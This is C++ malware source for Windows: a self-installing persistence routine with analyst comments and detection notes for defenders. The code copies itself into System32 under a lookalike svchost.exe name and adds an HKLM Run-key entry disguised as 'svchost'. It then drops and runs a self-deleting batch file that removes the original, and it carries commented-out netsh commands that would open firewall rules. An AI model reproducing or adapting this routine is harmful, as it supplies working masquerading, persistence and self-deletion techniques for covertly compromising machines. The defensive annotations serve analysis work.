// Self-installing persistence routine, documented here for analysis purposes.
// What the body below does, step by step:
//   1. Builds a target path in the Windows system directory whose file name
//      resembles "svchost.exe" (the string literal contains a mis-encoded,
//      non-ASCII byte, so the name is a lookalike of the legitimate host
//      process name rather than the exact string).
//   2. If the current executable (Path) is not already that target, copies
//      itself there and registers the copy under
//      HKLM\Software\Microsoft\Windows\CurrentVersion\Run as value "svchost".
//   3. Writes "destroy.bat" into the current working directory: it waits
//      briefly, starts the installed copy, deletes the original executable and
//      finally deletes itself; the batch is launched through ShellExecute.
// Detection / mitigation notes for defenders:
//   - A Run-key value set under HKLM by a non-installer process, named after a
//     Windows system binary, is a high-signal persistence event (registry
//     value-set auditing on the Run key, e.g. Sysmon event 13).
//   - A file dropped into the system directory whose name only looks like
//     svchost.exe (non-ASCII byte, no valid signature) is a masquerading
//     indicator; the real service host is signed and lives at a fixed name.
//   - A short-lived .bat containing a ping-based delay followed by "del" of the
//     parent executable is a self-deletion pattern; process command-line
//     logging (Sysmon event 1 / Windows 4688) records the cmd.exe invocation.
//   - CopyFile into System32 and RegCreateKeyEx on HKLM need administrative
//     rights; under a standard user with UAC enabled both fail. No return
//     value is checked, so the routine proceeds and still reports success.
// Parameter: Path - path of the currently running executable, supplied by the
//            caller (no validation or length check is performed on it).
// Returns: false when Path already equals the install path (i.e. this is the
//          relaunched copy); true in every other case, including when the copy
//          or the registry write failed.
bool Autorun(char *Path) // complex stealth method: moving to %system32%, autorun, making firewall exception and destruction of first instance
{
HKEY key;
char runkey[] = "Software\\Microsoft\\Windows\\CurrentVersion\\Run"; // per-machine autostart key (requires admin to write)
char valuename[] = "svchost"; // value name chosen to blend in with the legitimate service host
char filename[61]; // install path; 61 bytes is enough for a 32-char system dir plus the file name
char Win_Dir[33]; // e.g. C:\Windows\system32 (19 chars) - longer system paths would be truncated by the call below
GetSystemDirectory(Win_Dir, sizeof Win_Dir); // return value (0 on failure) is ignored
sprintf(filename,"%s\\sv�host.exe", Win_Dir); // NOTE: literal holds a mis-encoded byte, so the name is a lookalike, not "svchost.exe"
if (strcmp(filename, Path) == 0)
{
return false; // already running from the install path: nothing to do
}
else if (strcmp(filename, Path) != 0) // always true when reached; the trailing return below is unreachable
{
CopyFile(Path, filename, 0); // bFailIfExists = 0: overwrites an existing file; result not checked
RegCreateKeyEx(HKEY_LOCAL_MACHINE, runkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL); // result not checked; key may be uninitialised on failure
RegSetValueEx(key, valuename, 0, REG_SZ, (LPBYTE)filename, 33); // data length is the fixed constant 33, not the string length, so the stored value may be truncated or carry trailing bytes
RegCloseKey(key);
std::ofstream bat("destroy.bat"); // written relative to the current working directory, not to a fixed location
bat << "chcp 1251 > nul" << std::endl; // switch console code page to Windows-1251 (Cyrillic)
bat << "ping -n 1 -w 1000 127.0.0.1 > nul" << std::endl; // used as a short delay before acting
bat << "cd " << Win_Dir << std::endl;
bat << "start \"something\", " << filename << std::endl; // launch the installed copy
bat << "cd %~dp0" << std::endl; // back to the batch file's own directory
//bat << "Netsh Advfirewall Firewall Add rule name= dir=in action=allow enable=yes protocol=any program=" << filename << " localport=any remoteport=any > nul" << std::endl;
//bat << "Netsh Advfirewall Firewall Add rule name= dir=out action=allow enable=yes protocol=any program=" << filename << " localport=any remoteport=any > nul" << std::endl;
bat << "del " << "\"" << Path << "\"" << std::endl; // remove the original executable
bat << "del destroy.bat" << std::endl; // the batch deletes itself last
bat.close();
ShellExecute(NULL, (LPCSTR)"open", (LPCSTR)"destroy.bat", NULL, NULL, NULL); // relative path: resolved against the current working directory; result not checked
return true;
}
return true; // unreachable: both branches above return
}